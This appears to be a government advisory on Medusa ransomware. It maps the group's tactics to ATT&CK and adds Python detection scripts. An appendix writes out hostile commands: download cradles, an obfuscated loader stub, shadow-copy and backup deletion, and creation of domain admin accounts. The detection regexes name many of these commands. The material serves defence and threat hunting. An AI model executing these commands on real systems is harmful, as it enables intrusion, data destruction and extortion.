See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Background
The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.

Initial Access
Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:
- Phishing campaigns as a primary method for stealing victim credentials [T1566].
- Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and the Fortinet EMS SQL injection vulnerability CVE-2023-48788 [CWE-89: SQL Injection].

Discovery
Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration.
Once a foothold in a victim network is established, commonly scanned ports include:
- 21 (FTP)
- 22 (SSH)
- 23 (Telnet)
- 80 (HTTP)
- 115 (SFTP)
- 443 (HTTPS)
- 1433 (SQL database)
- 3050 (Firebird database)
- 3128 (HTTP web proxy)
- 3306 (MySQL database)
- 3389 (RDP)

Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.

Defense Evasion
Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress. Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].

In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.
powershell -exec bypass -enc

In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi)

In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload.
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'','', '')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.

In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].

FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:
- Ligolo. A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.
- Cloudflared. Formerly known as ArgoTunnel. Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.

Lateral Movement and Execution
Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486].
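The three PowerShell evasion patterns above can be triaged mechanically from process command lines or script block logs. The following is an added example, not code from the advisory: it decodes -enc payloads, rejoins sliced string literals so that 'D' + 'Own' + 'LOa' + 'DfI' + 'le' is matched as DownloadFile, and flags the gzip/base64 scriptblock loader shape and PSReadline history deletion. The sample command lines (including the placeholder.invalid URL and the empty base64 payload) are constructed.

```python
"""Triage helpers for the PowerShell evasion patterns described in the advisory.
Added example, not code from the advisory; every command line below is constructed."""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts any prefix).
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
# Two or more quoted string literals joined with '+', e.g. 'D' + 'Own' + 'LOa' + 'DfI' + 'le'.
STR_LIT = r"(?:'[^']*'|\"[^\"]*\")"
CONCAT_RE = re.compile(STR_LIT + r"(?:\s*\+\s*" + STR_LIT + r")+")
# All three must appear for the in-memory gzip/base64 scriptblock loader shown above.
GZIP_LOADER_MARKERS = ("frombase64string", "gzipstream", "scriptblock]::create")
# Method and cmdlet names that actors hide behind string slicing.
SUSPICIOUS_TOKENS = ("downloadfile", "downloadstring", "invoke-expression", "net.webclient")


def decode_encoded_command(blob):
    """-enc payloads are UTF-16LE script text, base64 encoded. Returns None on garbage."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rejoin_string_fragments(cmdline):
    """Collapse concatenated literals so token matching sees the real method name.
    Returns (normalized command line, list of rejoined values)."""
    rejoined = []

    def _join(match):
        parts = re.findall(r"'([^']*)'|\"([^\"]*)\"", match.group(0))
        value = "".join(single or double for single, double in parts)
        rejoined.append(value)
        return "'" + value + "'"

    return CONCAT_RE.sub(_join, cmdline), rejoined


def analyze_powershell(cmdline):
    """Map one process command line to the ATT&CK IDs the advisory uses for these patterns."""
    lowered = cmdline.lower()
    techniques = []
    decoded = None
    enc = ENC_FLAG_RE.search(cmdline)
    if enc:
        techniques.append("T1027.013")          # encoded command
        decoded = decode_encoded_command(enc.group(1))
    normalized, rejoined = rejoin_string_fragments(cmdline)
    if any(tok in value.lower() for value in rejoined for tok in SUSPICIOUS_TOKENS):
        techniques.append("T1027")              # string-slicing obfuscation
    if all(marker in lowered for marker in GZIP_LOADER_MARKERS):
        techniques.append("T1027:gzip-scriptblock-loader")
    if "remove-item" in lowered and "historysavepath" in lowered:
        techniques.append("T1070.003")          # PSReadline history deletion
    return {"techniques": techniques, "decoded": decoded, "normalized": normalized}


# Constructed samples (not observed data): a benign encoded command, the slicing example
# from the advisory with a placeholder URL, the gzip loader shape with an empty payload,
# the history deletion, and an ordinary administrative invocation that must not fire.
SAMPLE_ENC = base64.b64encode("Write-Host test".encode("utf-16-le")).decode()
SAMPLES = [
    "powershell -exec bypass -enc " + SAMPLE_ENC,
    "powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; "
    "Invoke-Expression (New-Object Net.WebClient).$x.Invoke('http://placeholder.invalid/x.msi')",
    "powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object "
    "System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object "
    "System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'','', '')))),"
    "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",
    "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath",
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze_powershell(line)["techniques"], line[:60])
```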
When provided with valid username and password credentials, Medusa actors use PsExec to:
- Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s).
- Execute an already existing local file on a remote machine with SYSTEM level privileges.
- Execute remote shell commands using cmd /c.

One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389:
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

Then, a rule to allow remote WMI connections is created:
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

Finally, the registry is modified to allow Remote Desktop connections:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.

Exfiltration and Encryption
Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].
Extortion
Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”—potentially indicating a triple extortion scheme.

Indicators of Compromise
Table 1 lists the hashes of malicious files obtained during investigations.

Table 1: Malicious Files
Files | Hash (MD5) | Description
!!!READ_ME_MEDUSA!!!.txt | Redacted | Ransom note file
openrdp.bat | 44370f5c977e415981febf7dbb87a85c | Allows incoming RDP and remote WMI connections
pu.exe | 80d852cd199ac923205b61658a9ec5bc | Reverse shell

Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.
Table 2: Medusa Email Addresses
Email Addresses | Description
key.medusa.serviceteam@protonmail.com | Used for ransom negotiation
medusa.support@onionmail.org | Used for ransom negotiation
mds.svt.breach@protonmail.com | Used for ransom negotiation
mds.svt.mir2@protonmail.com | Used for ransom negotiation
MedusaSupport@cock.li | Used for ransom negotiation

MITRE ATT&CK Tactics and Techniques
See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Initial Access
Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.
Initial Access | TA0001 | Medusa actors recruited initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access.
Phishing | T1566 | Medusa IABs used phishing campaigns as a primary method for delivering ransomware to victims.

Table 4: Defense Evasion
Technique Title | ID | Use
Indicator Removal: Clear Command History | T1070.003 | Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.
Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 | Medusa actors use a well-known evasion technique that executes a base64 encrypted command.
Obfuscated Files or Information | T1027 | Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.
Indicator Removal | T1070 | Medusa actors deleted their previous work and tools installed.
Impair Defenses: Disable or Modify Tools | T1562.001 | Medusa actors killed or deleted endpoint detection and response tools.

Table 5: Discovery
Technique Title | ID | Use
Network Service Discovery | T1046 | Medusa actors utilized living off the land techniques to perform network enumeration.
File and Directory Discovery | T1083 | Medusa actors utilized Windows Command Prompt for filesystem enumeration.
Network Share Discovery | T1135 | Medusa actors queried shared drives on the local system to gather sources of information.
System Network Configuration Discovery | T1016 | Medusa actors used operating system administrative utilities to gather network information.
System Information Discovery | T1082 | Medusa actors used the command systeminfo to gather detailed system information.
Permission Groups Discovery: Domain Groups | T1069.002 | Medusa actors attempt to find domain-level group and permission settings.

Table 6: Credential Access
Technique Title | ID | Use
Credential Access | TA0006 | Medusa actors harvest credentials with tools like Mimikatz to gain access to systems.
OS Credential Dumping: LSASS Memory | T1003.001 | Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimikatz.

Table 7: Lateral Movement and Execution
Technique Title | ID | Use
Lateral Movement | TA0008 | Medusa actors performed techniques to move laterally without detection once they gained initial access.
Command and Scripting Interpreter: PowerShell | T1059.001 | Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment, for ingress, network, and filesystem enumeration.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration.
Software Deployment Tools | T1072 | Medusa actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network.
Remote Services: Remote Desktop Protocol | T1021.001 | Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally.
System Services | T1569.002 | Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network.
Windows Management Instrumentation | T1047 | Medusa actors abused Windows Management Instrumentation to query system information.

Table 8: Exfiltration and Encryption
Technique Title | ID | Use
Exfiltration | TA0010 | Medusa actors identified files to exfiltrate out of victim networks.
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers.

Table 9: Command and Control
Technique Title | ID | Use
Ingress Tool Transfer | T1105 | Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress.
Application Layer Protocol: Web Protocols | T1071.001 | Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS.
Remote Access Software | T1219 | Medusa actors used remote access software to move laterally through the network.

Table 10: Persistence
Technique Title | ID | Use
Create Account | T1136.002 | Medusa actors created a domain account to maintain access to victim systems.

Table 11: Impact
Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Medusa identified and encrypted data on target systems to interrupt availability to system and network resources.
Inhibit System Recovery | T1490 | The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note.
Financial Theft | T1657 | Victims must pay to decrypt files and prevent further release by Medusa actors.
System Shutdown/Reboot | T1529 | Medusa actors manually turned off and encrypted virtual machines.
Service Stop | T1489 | The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites.

Mitigations
FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
- Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].
- Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C].
- Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
- Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
- Segment networks to prevent the spread of ransomware.
Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
- Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
- Require VPNs or Jump Hosts for remote access.
- Monitor for unauthorized scanning and access attempts.
- Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.
- Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
- Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
- Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].
- Disable unused ports [CPG 2.V].
- Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data.
- Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

Validate Security Controls
In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:
1. Select an ATT&CK technique described in this advisory (Table 3 to Table 11).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources
- Joint #StopRansomware Guide.
- Joint Guide Identifying and Mitigating Living Off the Land Techniques.
- Joint Guide to Securing Remote Access Software.

Reporting
Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.
FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

Disclaimer
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC.

Acknowledgements
ConnectWise contributed to this advisory.

Version History
March 12, 2025: Initial version.
Appendix A: Medusa Commands
These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.

cmd.exe /c certutil -f urlcache https:///.css .dll
cmd.exe /c certutil -f urlcache https:///.msi .msi
cmd.exe /c driverquery
cmd.exe /c echo Computer: %COMPUTERNAME% & ` echo Username: %USERNAME% & ` echo Domain: %USERDOMAIN% & ` echo Logon Server: %LOGONSERVER% & ` echo DNS Domain: %USERDNSDOMAIN% & ` echo User Profile: %USERPROFILE% & echo ` System Root: %SYSTEMROOT%
cmd.exe /c ipconfig /all [T1016]
cmd.exe /c net share [T1135]
cmd.exe /c net use
cmd.exe /c netstat -a
cmd.exe /c sc query
cmd.exe /c schtasks
cmd.exe /c systeminfo [T1082]
cmd.exe /c ver
cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname
cmd.exe /c wmic printjob
mmc.exe compmgmt.msc /computer:{hostname/ip}
mstsc.exe /v:{hostname/ip}
mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}
powershell -exec bypass -enc
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi)
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'', '','')))), [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate, logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path -NoTypeInformation -Encoding UTF8
psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe"
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat
nltest /dclist:
net group "domain admins" /domain [T1069.002]
net group "Domain Admins" default /add /domain
net group "Enterprise Admins" default /add /domain
net group "Remote Desktop Users" default /add /domain
net group "Group Policy Creator Owners" default /add /domain
net group "Schema Admins" default /add /domain
net group "domain users" /domain
net user default /active:yes /domain
net user /add default /domain [T1136.002]
query user
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
systeminfo
vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded
del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBackup*.* %sbackup*.* %s*.set %s*.win %s*.dsk
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
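As an added example of how a threat hunter might operationalize Appendix A (this is not code from the advisory), the following Python maps process-creation command lines to the Appendix A commands and the ATT&CK IDs the advisory assigns to them, then aggregates hits per host so that a single machine running several of these commands stands out even when each command alone looks administrative. The rule weights, the escalation threshold, the hostnames, users and events are all constructed for illustration.

```python
"""Rule-driven triage of process-creation events against the Appendix A command set.
Added example, not code from the advisory: rule names, weights, the escalation threshold
and every sample event below are constructed for illustration."""
import re
from collections import defaultdict

# (rule name, ATT&CK ID as the advisory maps it or "" where it gives none, weight, regex).
# Weights are a constructed tuning choice: discovery commands alone are weak signals,
# recovery inhibition and privileged account changes are strong ones.
RULES = [
    ("certutil_urlcache_ingress", "T1105", 3, r"certutil(\.exe)?\s+.*\burlcache\b"),
    ("psexec_system_remote_exec", "T1569.002", 4, r"psexec(\.exe)?\s+.*-s\s+\\\\\S+"),
    ("taskkill_force_image", "T1562.001", 4, r'taskkill(\.exe)?"?\s+/f\s+/im\s+\S+'),
    ("netsh_allow_rdp_3389", "T1021.001", 3,
     r"netsh\s+advfirewall\s+firewall\s+add\s+rule\s+.*localport=3389.*action=allow"),
    ("netsh_enable_wmi_rules", "", 2,
     r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="windows management instrumentation \(wmi\)"\s+new\s+enable=yes'),
    ("reg_allow_ts_connections", "T1021.001", 3, r"fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0\b"),
    ("vssadmin_shadow_tamper", "T1490", 5, r"vssadmin(\.exe)?\s+(delete\s+shadows|resize\s+shadowstorage)"),
    ("backup_file_wipe", "T1490", 5, r"\bdel\s+/s\s+/f\s+/q\s+.*\.(vhd|bak|bkf|wbcat)\b"),
    ("net_user_add_domain", "T1136.002", 4, r"\bnet\s+user\s+/add\s+\S+\s+/domain\b"),
    ("net_group_privileged_add", "", 5,
     r'\bnet\s+group\s+"(domain admins|enterprise admins|schema admins|remote desktop users|group policy creator owners)"\s+\S+\s+/add\s+/domain\b'),
    ("net_group_domain_admins_query", "T1069.002", 1, r'\bnet\s+group\s+"domain admins"\s+/domain\s*$'),
    ("net_share_discovery", "T1135", 1, r"\bnet\s+share\b"),
    ("ipconfig_all", "T1016", 1, r"\bipconfig\s+/all\b"),
    ("systeminfo", "T1082", 1, r"\bsysteminfo\b"),
    ("mstsc_with_credentials", "T1021.001", 3, r"mstsc(\.exe)?\s+/v:\S+\s+/u:\S+\s+/p:"),
]
COMPILED = [(name, tid, weight, re.compile(pat, re.IGNORECASE)) for name, tid, weight, pat in RULES]


def match_command(cmdline):
    """Return every rule one command line trips as (rule name, ATT&CK ID, weight)."""
    return [(name, tid, weight) for name, tid, weight, rx in COMPILED if rx.search(cmdline)]


def triage(events, threshold=6):
    """Aggregate rule hits per host; hosts whose summed weight reaches the
    (constructed) threshold are marked for escalation."""
    per_host = defaultdict(lambda: {"score": 0, "hits": []})
    for event in events:
        for name, tid, weight in match_command(event["CommandLine"]):
            entry = per_host[event["Computer"]]
            entry["score"] += weight
            entry["hits"].append({"rule": name, "technique": tid, "user": event["User"]})
    return {host: dict(entry, escalate=entry["score"] >= threshold) for host, entry in per_host.items()}


# Constructed Sysmon-style process-creation events; hostnames and users are placeholders.
EVENTS = [
    {"Computer": "WS01", "User": "CORP\\alice", "CommandLine": "cmd.exe /c ipconfig /all"},
    {"Computer": "WS01", "User": "CORP\\alice", "CommandLine": "cmd.exe /c systeminfo"},
    {"Computer": "SRV02", "User": "CORP\\svc_deploy",
     "CommandLine": r"psexec.exe -accepteula -nobanner -s \\FS03 -c openrdp.bat"},
    {"Computer": "FS03", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": 'netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow'},
    {"Computer": "FS03", "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"Computer": "SRV02", "User": "CORP\\svc_deploy", "CommandLine": "vssadmin.exe Delete Shadows /all /quiet"},
    {"Computer": "SRV02", "User": "CORP\\svc_deploy", "CommandLine": 'net group "Domain Admins" default /add /domain'},
    {"Computer": "SRV02", "User": "CORP\\svc_deploy", "CommandLine": "net user /add default /domain"},
]

if __name__ == "__main__":
    for host, entry in triage(EVENTS).items():
        verdict = "ESCALATE" if entry["escalate"] else "review"
        print(host, entry["score"], verdict, [hit["rule"] for hit in entry["hits"]])
```

Discovery-only activity on WS01 stays below the threshold, while the two openrdp.bat steps on FS03 and the shadow-copy and account changes on SRV02 are escalated.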